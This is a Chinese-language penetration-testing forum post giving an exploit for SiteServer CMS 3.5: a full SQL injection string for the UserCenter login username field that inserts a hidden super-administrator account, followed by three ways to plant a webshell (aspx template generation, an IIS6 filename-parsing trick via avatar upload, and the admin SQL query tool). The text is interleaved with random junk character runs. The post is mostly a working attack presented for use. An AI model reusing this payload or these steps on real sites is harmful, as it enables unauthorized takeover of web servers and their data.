中国网络渗透测试联盟

标题: SiteServer CMS UserCenter/login.aspx页面用户名处sql注射 [打印本页]

作者: admin    时间: 2013-2-16 21:40
标题: SiteServer CMS UserCenter/login.aspx页面用户名处sql注射
经测试秒杀最新的3.5版
1 d& \4 _5 z" H* q& |2 \stieserver官网:www.siteserver.cn
- u, C- t2 H! h1 O! \. J( |1 {* `EXP:* `. d& x6 h6 ]
直接访问UserCenter/login.aspx& C+ C; s: W) r& M. O8 E
用户名处输入:
9 F& a( I3 k5 z/ N
. I) F8 c- }+ {! y! l& q123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
) W0 F- R0 W1 e( T3 d$ A  F密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
0 K. R: v* R0 _8 L之后再访问后台SiteServer/login.aspx用插入的用户登陆
7 ^% O) I$ s3 d( p后台拿webshell的三种方法:
2 l! T+ n) B6 f. ]. E5 B$ ?一、
3 e' L5 G% D& S2 C: M( b( M: u站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
+ [& z$ p1 A9 y) D二、! J9 [$ N0 R/ C, w3 W1 }$ ^
成员权限-》添加用户-》用户名为:1.asp& p7 y, s" v2 W, \, n
http://127.0.0.1/usercenter// F5 p% [0 ]& X: m
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell4 N  V! P3 M2 H
(ps:后台添加用户时不会验证是否含有非法字符)5 A. e% {: B. ^
三、
9 |( Y0 Z8 X, \系统工具-》实用工具-》机器参数查看% X6 O; r4 Z2 S
可以看到数据库类型、名称,WEB路径$ n: u' p* R8 }1 `
系统工具-》数据库工具-》SQL语句查询0 z, h' `; |' s. ]% ?1 j" ]0 K7 Q7 l
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2